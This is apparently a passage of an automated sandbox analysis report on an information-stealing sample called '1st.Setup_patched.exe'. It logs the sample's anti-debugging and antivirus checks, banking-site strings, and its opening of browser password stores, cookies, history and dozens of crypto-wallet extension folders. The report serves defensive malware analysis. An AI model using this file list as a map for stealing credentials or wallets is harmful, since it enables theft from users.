      Source: 1st.Setup_patched.exe, 00000000.00000003.1546955693.00000000016C2000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548063832.00000000016C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
      Source: 1st.Setup_patched.exe, 00000000.00000003.1496368069.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548136991.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1407144072.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1509169903.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1498936354.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1536407443.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1547005847.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1495829178.00000000016F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004178000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
      Source: 1st.Setup_patched.exe, 00000000.00000003.1445529561.0000000004173000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_3_0357B240 LdrInitializeThunk,0_3_0357B240
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004F8A95 IsDebuggerPresent,0_2_004F8A95
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_00503016 EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00503016
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004F2132 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C0_2_004F2132
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_00503016 EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00503016
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004EE770 mov esi, dword ptr fs:[00000030h]0_2_004EE770
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004EE697 GetProcessHeap,HeapAlloc,InterlockedPopEntrySList,InterlockedPopEntrySList,VirtualAlloc,RaiseException,InterlockedPopEntrySList,VirtualFree,InterlockedPushEntrySList,0_2_004EE697
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004F7282 SetUnhandledExceptionFilter,0_2_004F7282
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_00458BA0 GetSecurityDescriptorDacl,_malloc,InitializeSecurityDescriptor,_malloc,_memcpy_s,SetSecurityDescriptorDacl,_free,_free,_free,0_2_00458BA0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004A2950 GetUserNameExW,__CxxThrowException@8,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_004A2950
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: EnumSystemLocalesW,0_2_00506153
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_00506193
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_00506210
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,0_2_00506293
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: GetLocaleInfoW,0_2_00506486
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_005065AE
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_0050665B
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_004F4650
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: _TranslateName,_TranslateName,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,0_2_005066C3
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_005050FD
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_00480340 GetLocalTime,0_2_00480340
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004A28F0 GetUserNameW,__CxxThrowException@8,0_2_004A28F0
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_004F26A1 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_004F26A1
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeCode function: 0_2_00476E20 GetVersionExW,__CxxThrowException@8,__CxxThrowException@8,0_2_00476E20
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: 1st.Setup_patched.exe, 00000000.00000003.1518040299.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1535126994.000000000177A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1547174311.000000000177B000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1518040299.000000000177A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1546842987.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548301210.000000000177C000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000002.1548204868.000000000174A000.00000004.00000020.00020000.00000000.sdmp, 1st.Setup_patched.exe, 00000000.00000003.1537648643.000000000177B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000003.1547321382.0000000003431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdliaogehgdbhbnmkklieghmmjkpigpaJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\Desktop\1st.Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
